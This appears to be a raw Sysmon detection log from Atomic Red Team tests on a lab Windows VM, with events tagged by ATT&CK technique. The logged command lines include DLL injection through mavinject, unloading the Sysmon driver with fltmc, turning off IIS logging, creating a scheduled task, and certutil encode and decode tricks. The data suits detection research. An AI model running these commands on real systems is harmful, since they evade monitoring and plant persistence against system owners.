SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1563548266.608481,2019-07-19T18:57:46.608481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 ),1,"
1
5
4
1
0
0x8000000000000000
4086
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Persistence - Scheduled Task Management
2019-07-19 14:57:46.443
747F3D96-DA6A-5D31-0000-0010C4A83E00
1408
C:\Windows\System32\schtasks.exe
10.0.17763.1 (WinBuild.160101.0800)
Task Scheduler Configuration Tool
Microsoft® Windows® Operating System
Microsoft Corporation
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69
747F3D96-DA6A-5D31-0000-001072A63E00
4276
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.459733,2019-07-19T18:57:46.459733+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" ),1,"
1
5
4
1
0
0x8000000000000000
4085
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:46.411
747F3D96-DA6A-5D31-0000-001072A63E00
4276
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.422427,2019-07-19T18:57:46.422427+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4084
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:46.174
747F3D96-DA6A-5D31-0000-0010C09D3E00
3224
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.094355,2019-07-19T18:57:46.094355+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd" ),1,"
1
5
4
1
0
0x8000000000000000
4082
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:46.051
747F3D96-DA6A-5D31-0000-0010B2953E00
5036
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548264.283188,2019-07-19T18:57:44.283188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4080
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:16.531
747F3D96-DA4C-5D31-0000-001077603D00
6172
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548236.552097,2019-07-19T18:57:16.552097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe ),1,"
1
5
4
1
0
0x8000000000000000
4079
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:16.477
747F3D96-DA4C-5D31-0000-0010655D3D00
2596
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1179] Hooking detected,1563548236.496455,2019-07-19T18:57:16.496455+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\mavinject.exe ) through command line ( "C:\Windows\system32\mavinject.exe" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll ),1,"
1
5
4
1
0
0x8000000000000000
4078
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:15.754
747F3D96-DA4B-5D31-0000-0010CB413D00
2604
C:\Windows\System32\mavinject.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft Application Virtualization Injector
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\mavinject.exe" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548235.776993,2019-07-19T18:57:15.776993+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4077
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:14.972
747F3D96-DA4A-5D31-0000-00107A2C3D00
2584
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.991615,2019-07-19T18:57:14.991615+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true" ),1,"
1
5
4
1
0
0x8000000000000000
4076
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:14.928
747F3D96-DA4A-5D31-0000-00106C293D00
4056
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.944276,2019-07-19T18:57:14.944276+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4075
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:14.745
747F3D96-DA4A-5D31-0000-0010EE223D00
1012
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.758535,2019-07-19T18:57:14.758535+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv" ),1,"
1
5
4
1
0
0x8000000000000000
4074
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:14.696
747F3D96-DA4A-5D31-0000-0010C21F3D00
3976
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.715974,2019-07-19T18:57:14.715974+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4073
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:04.529
747F3D96-DA40-5D31-0000-0010E16B3C00
264
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.41285,2019-07-19T18:57:04.412850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt ),1,"
1
5
4
1
0
0x8000000000000000
4069
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:04.346
747F3D96-DA40-5D31-0000-0010565D3C00
3932
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DA40-5D31-0000-0010CF5A3C00
4336
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.361122,2019-07-19T18:57:04.361122+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt" ),1,"
1
5
4
1
0
0x8000000000000000
4068
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:04.316
747F3D96-DA40-5D31-0000-0010CF5A3C00
4336
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.333864,2019-07-19T18:57:04.333864+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp ),1,"
1
5
4
1
0
0x8000000000000000
4067
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:04.256
747F3D96-DA40-5D31-0000-0010B1553C00
5168
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DA40-5D31-0000-00106A543C00
6572
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.294575,2019-07-19T18:57:04.294575+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp" ),1,"
1
5
4
1
0
0x8000000000000000
4066
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:04.236
747F3D96-DA40-5D31-0000-00106A543C00
6572
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548224.270645,2019-07-19T18:57:04.270645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4065
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:03.938
747F3D96-DA3F-5D31-0000-0010813E3C00
7140
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -decode file.txt c:\file.exe)",1,"
1
5
4
1
0
0x8000000000000000
4064
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:03.818
747F3D96-DA3F-5D31-0000-001022323C00
6888
C:\Windows\System32\certutil.exe
10.0.17763.1 (WinBuild.160101.0800)
CertUtil.exe
Microsoft® Windows® Operating System
Microsoft Corporation
certutil.exe -decode file.txt c:\file.exe
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
747F3D96-DA3F-5D31-0000-0010562E3C00
4020
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1140] Deobfuscate/Decode Files or Information,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ) attempting to decode a file or information,1,"
1
5
4
1
0
0x8000000000000000
4064
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:03.818
747F3D96-DA3F-5D31-0000-001022323C00
6888
C:\Windows\System32\certutil.exe
10.0.17763.1 (WinBuild.160101.0800)
CertUtil.exe
Microsoft® Windows® Operating System
Microsoft Corporation
certutil.exe -decode file.txt c:\file.exe
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
747F3D96-DA3F-5D31-0000-0010562E3C00
4020
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ),1,"
1
5
4
1
0
0x8000000000000000
4064
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:03.818
747F3D96-DA3F-5D31-0000-001022323C00
6888
C:\Windows\System32\certutil.exe
10.0.17763.1 (WinBuild.160101.0800)
CertUtil.exe
Microsoft® Windows® Operating System
Microsoft Corporation
certutil.exe -decode file.txt c:\file.exe
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
747F3D96-DA3F-5D31-0000-0010562E3C00
4020
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548223.974754,2019-07-19T18:57:03.974754+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" ),1,"
1
5
4
1
0
0x8000000000000000
4063
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:03.786
747F3D96-DA3F-5D31-0000-0010562E3C00
4020
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -encode c:\file.exe file.txt)",1,"
1
5
4
1
0
0x8000000000000000
4062
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:03.261
747F3D96-DA3F-5D31-0000-00109E193C00
1260
C:\Windows\System32\certutil.exe
10.0.17763.1 (WinBuild.160101.0800)
CertUtil.exe
Microsoft® Windows® Operating System
Microsoft Corporation
certutil.exe -encode c:\file.exe file.txt
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
747F3D96-DA3F-5D31-0000-00104C173C00
4832
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -encode c:\file.exe file.txt ),1,"
1
5
4
1
0
0x8000000000000000
4062
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:03.261
747F3D96-DA3F-5D31-0000-00109E193C00
1260
C:\Windows\System32\certutil.exe
10.0.17763.1 (WinBuild.160101.0800)
CertUtil.exe
